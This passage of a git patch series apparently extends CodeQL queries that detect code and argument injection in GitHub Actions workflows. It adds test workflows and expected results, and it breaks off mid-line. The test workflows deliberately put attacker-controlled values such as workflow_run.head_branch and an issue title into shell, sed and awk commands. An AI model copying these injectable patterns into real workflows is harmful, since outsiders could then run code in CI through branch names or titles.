+ run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + env: + MKL_SERVICE_FORCE_INTEL: 1 + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_torch_cuda_extensions_single_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct 
branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . 
+ + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + run_tests_torch_cuda_extensions_multi_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, 
t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . 
+ + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + send_results: + name: Send results to webhook + runs-on: ubuntu-22.04 + if: always() + needs: [ + setup, + run_tests_single_gpu, + run_tests_multi_gpu, + run_tests_torch_cuda_extensions_single_gpu, + run_tests_torch_cuda_extensions_multi_gpu + ] + steps: + - name: Preliminary job status + shell: bash + # For the meaning of these environment 
variables, see the job `Setup` + run: | + echo "Setup status: ${{ needs.setup.result }}" + + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - uses: actions/checkout@v4 + # To avoid failure when multiple commits are merged into `main` in a short period of time. + # Checking out to an old commit beyond the fetch depth will get an error `fatal: reference is not a tree: ... 
+ # (Only required for `workflow_run` event, where we get the latest HEAD on `main` instead of the event commit) + with: + fetch-depth: 20 + + - name: Update clone using environment variables + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - uses: actions/download-artifact@v4 + - name: Send message to Slack + env: + CI_SLACK_BOT_TOKEN: ${{ secrets.CI_SLACK_BOT_TOKEN }} + CI_SLACK_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + CI_SLACK_CHANNEL_ID_DAILY: ${{ secrets.CI_SLACK_CHANNEL_ID_DAILY }} + CI_SLACK_CHANNEL_DUMMY_TESTS: ${{ secrets.CI_SLACK_CHANNEL_DUMMY_TESTS }} + CI_SLACK_REPORT_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + ACCESS_REPO_INFO_TOKEN: ${{ secrets.ACCESS_REPO_INFO_TOKEN }} + CI_EVENT: push + CI_TITLE_PUSH: ${{ github.event.head_commit.message }} + CI_TITLE_WORKFLOW_RUN: ${{ github.event.workflow_run.head_commit.message }} + CI_SHA: ${{ env.CI_SHA }} + SETUP_STATUS: ${{ needs.setup.result }} + + # We pass `needs.setup.outputs.matrix` as the argument. A processing in `notification_service.py` to change + # `models/bert` to `models_bert` is required, as the artifact names use `_` instead of `/`. + run: | + pip install slack_sdk + pip show slack_sdk + python utils/notification_service.py "${{ needs.setup.outputs.matrix }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 3330ad89311f..3f2d9ebc2c9c 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -272,6 +272,12 @@ nodes | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e325205d8c89..4de44d836355 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -272,6 +272,12 @@ nodes | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -328,6 +334,12 @@ subpaths | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From eb66114d8bf0d0bc5f273f1d2b8e70873a464c31 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 11:35:44 +0200 Subject: [PATCH 399/707] feat(models): New ArgInj sink --- ql/lib/ext/config/argument_injection_sinks.yml | 1 + .../Security/CWE-094/.github/workflows/arg_injection.yml | 5 +---- .../Security/CWE-094/ArgumentInjectionCritical.expected | 3 +++ .../Security/CWE-094/ArgumentInjectionMedium.expected | 2 ++ 4 files changed, 7 insertions(+), 4 deletions(-) diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 727c982d2ec2..4588af0bf00f 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -4,5 +4,6 @@ extensions: extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ data: + - ["(awk)(.*?)", 2, 3] - ["(sed)(.*?)", 2, 3] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index 19435af16d3b..0956aea61bdb 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -14,7 +14,4 @@ jobs: - run: sed "s/FOO/$TITLE/g" - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - - - - + - run: awk "BEGIN {$TITLE}" diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 21483efe36ca..13f4954eac37 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected 
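Review bot: The new `["(awk)(.*?)", 2, 3]` entry treats everything after `awk` as a code position, so `awk -v title="$TITLE" '{ print title }'` (value passed as awk data) will be reported exactly like `awk "BEGIN {$TITLE}"` (value spliced into program text), although only the latter lets the value change what awk executes. If that coarseness is accepted for now, a comment next to the entry saying so would stop a later reader from "tightening" it without understanding the trade-off, e.g. `# any awk argument is treated as program text; -v/-f data arguments are not yet distinguished`. The same applies to the neighbouring `sed` entry, which the hunk only shows as context.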
@@ -2,13 +2,16 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index c2ff2885a995..67f728705f41 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected 
@@ -2,10 +2,12 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | subpaths #select From f4581d0aa5e5b1dc0decd50e4ffa39af3e1da758 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 11:36:18 +0200 Subject: [PATCH 400/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 79545959a7df..e5e89afc471e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.17 +version: 0.1.18 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 30ed4dc6dae9..db9bdecf8b87 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.17 +version: 0.1.18 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7a54170b3129ea5facabf0e3fb2a0b98fcebc480 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 12:59:34 +0200 Subject: [PATCH 401/707] feat(ext): Move regexp delimiters to Config.qll --- ql/lib/codeql/actions/config/Config.qll | 41 +++++++++++-------- .../actions/security/PoisonableSteps.qll | 11 +---- 2 files changed, 27 insertions(+), 25 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 8d97e63786b5..3b273302fec3 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -51,7 +51,11 @@ predicate externallyTriggerableEventsDataModel(string event) { * - regexp: Regular expression for matching poisonable commands */ predicate poisonableCommandsDataModel(string regexp) { - Extensions::poisonableCommandsDataModel(regexp) + exists(string sub_regexp | + Extensions::poisonableCommandsDataModel(sub_regexp) and + // find regexp + regexp = 